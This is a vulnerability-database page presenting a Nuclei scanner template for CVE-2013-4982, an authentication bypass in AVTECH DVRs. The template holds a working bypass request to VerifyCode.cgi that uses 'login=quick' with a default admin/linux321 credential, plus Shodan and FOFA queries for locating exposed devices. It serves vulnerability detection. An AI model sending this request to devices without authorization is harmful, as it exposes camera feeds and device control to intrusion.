Lucene search
K

AVTECH DVR - Login Verification Code Bypass

🗓️ 27 Jun 2026 03:01:36Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 27 Views

AVTECH DVR login verification code bypass via login=quick parameter.

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities
29 Aug 201300:00
zdt
Circl
CVE-2013-4982
29 Aug 201300:00
circl
Core Security
AVTECH DVR multiple vulnerabilities
28 Aug 201300:00
coresecurity
Check Point Advisories
AVTECH Devices Multiple Vulnerabilities (CVE-2013-4980; CVE-2013-4981; CVE-2013-4982)
15 Mar 201700:00
checkpoint_advisories
CVE
CVE-2013-4982
27 Dec 201916:53
cve
Cvelist
CVE-2013-4982
27 Dec 201916:53
cvelist
Exploit DB
AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities
29 Aug 201300:00
exploitdb
EUVD
EUVD-2013-4826
7 Oct 202500:30
euvd
exploitpack
AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities
29 Aug 201300:00
exploitpack
NVD
CVE-2013-4982
27 Dec 201917:15
nvd
Rows per page
id: CVE-2013-4982

info:
  name: AVTECH DVR - Login Verification Code Bypass
  author: ritikchaddha
  severity: low
  description: |
    AVTECH DVR products are vulnerable to verification code bypass just by entering the "login=quick" parameter to bypass verification code.
  impact: |
    Attackers can bypass authentication mechanisms and gain unauthorized access to the DVR system, potentially viewing camera feeds, modifying settings, or compromising the device.
  remediation: |
    Update to the latest firmware version or contact the vendor for a security patch.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2013-4982
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5.0
    cve-id: CVE-2013-4982
    epss-score: 0.13117
    epss-percentile: 0.95868
    cwe-id: CWE-287
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"login" product:"Avtech"
    fofa-query: app="AVTECH-视频监控"
  tags: cve,cve2013,avtech,verify,bypass,iot,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/nobody/VerifyCode.cgi?account={{base64(username + ':' + password)}}&login=quick"

    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - linux321

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "^0.*\nOK.*"

      - type: dsl
        dsl:
          - status_code == 200
          - len(body) == 5
        condition: and
# digest: 4b0a0048304602210097ab820a2a716ab44670a8700f6ec8dda6fb00528dce4887649468333303a806022100e43c7cdc40f8d70dafddbdbe784018139215b55349fc65480fee64a60e5461e4:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 27.5
CVSS 3.19.8
EPSS0.13117
27